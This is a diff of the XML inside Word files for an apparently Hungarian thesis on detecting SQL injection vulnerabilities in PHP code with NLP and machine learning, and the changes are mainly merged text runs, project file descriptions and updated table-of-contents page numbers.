-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenated</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>_titled</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-t dolgozza fel.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Kifejtve a fájl főbb metódusait:</w:t>
+        <w:t>Kifejtve a főbb metódusait:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19281,6 +19286,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>változóba</w:t>
       </w:r>
       <w:r>
@@ -19323,7 +19329,6 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>változóban megadottra, így a vektorok hossza egységes marad.</w:t>
       </w:r>
       <w:r>
@@ -19487,23 +19492,13 @@
         </w:rPr>
         <w:t xml:space="preserve">z </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>X[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">40] </w:t>
+        <w:t xml:space="preserve">X[40] </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -19762,14 +19757,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> változókat lementi egy-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>egy .</w:t>
+        <w:t xml:space="preserve"> változókat lementi egy-egy .</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -19779,7 +19767,6 @@
         <w:t>npy</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -19793,123 +19780,192 @@
         <w:ind w:firstLine="567"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> program utolsó és legfontosabb lepésében a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\machine_learning_app</w:t>
-      </w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:highlight w:val="yellow"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>\cevtorizer.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>trainer.py</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> be</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lül </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hajtja végre a program legfőbb feladatát: betanítja a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> választott </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">algoritmust és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tehát két</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">becslést </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egy ismeretlen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PHP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>olyan .</w:t>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">kód SQL </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>npy</w:t>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>injectionbeli</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> fájlt hoz létre, amit később </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>machine_learning_app</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>trainer.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, az osztályozásért felelős fájl </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tud használni.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sebezhetőségével kapcsolatban.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -23449,7 +23505,7 @@
   <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="497422CA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="A65A3604"/>
+    <w:tmpl w:val="3F8AFC22"/>
     <w:lvl w:ilvl="0" w:tplc="040E0001">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -154,174 +154,8 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SQL injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>detection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>using</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>natural</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>language</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>processing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>systems</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>machine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>learning</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1047,33 +881,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egy kód SQL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>egy kód SQL injection</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>injection</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>beli</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">beli </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1213,43 +1029,39 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Visual </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Visual Studio Code</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Studio</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> fejlesztői környezetet</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>, e</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">mellett a gépi tanulás során Python, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> fejlesztői környezetet</w:t>
+        <w:t xml:space="preserve">a grafikus </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1257,7 +1069,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, e</w:t>
+        <w:t xml:space="preserve">asztali </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1265,7 +1077,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">mellett a gépi tanulás során Python, </w:t>
+        <w:t>felület megvalósításához</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1273,7 +1085,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">a grafikus </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1281,7 +1093,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">asztali </w:t>
+        <w:t>Java</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1289,34 +1101,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>felület megvalósításához</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Java</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>FX</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1522,9 +1308,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> train/test készlet,</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1533,9 +1318,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>train</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1544,7 +1328,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>/test készlet,</w:t>
+        <w:t>K-Fold</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1554,7 +1338,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1564,7 +1348,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Fold</w:t>
+        <w:t>c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1574,9 +1358,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>onfusion m</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1585,7 +1368,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>c</w:t>
+        <w:t>a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1595,9 +1378,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>onfusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">trix, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1606,9 +1388,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>r</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1617,7 +1398,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>m</w:t>
+        <w:t>ecal</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1627,61 +1408,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>trix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ecal</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>l</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1916,7 +1644,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>3</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1990,7 +1718,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2064,7 +1792,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2155,7 +1883,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2247,7 +1975,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2337,7 +2065,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>6</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2427,7 +2155,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2518,7 +2246,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2611,7 +2339,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>8</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2702,7 +2430,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2795,7 +2523,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2887,7 +2615,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2979,7 +2707,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3071,7 +2799,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>13</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3163,7 +2891,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>14</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3255,7 +2983,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3348,7 +3076,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3441,7 +3169,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>16</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3532,7 +3260,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>18</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3623,7 +3351,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>22</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3697,7 +3425,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>23</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3771,7 +3499,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>24</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3845,7 +3573,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3919,7 +3647,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>2</w:t>
+              <w:t>26</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4325,14 +4053,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
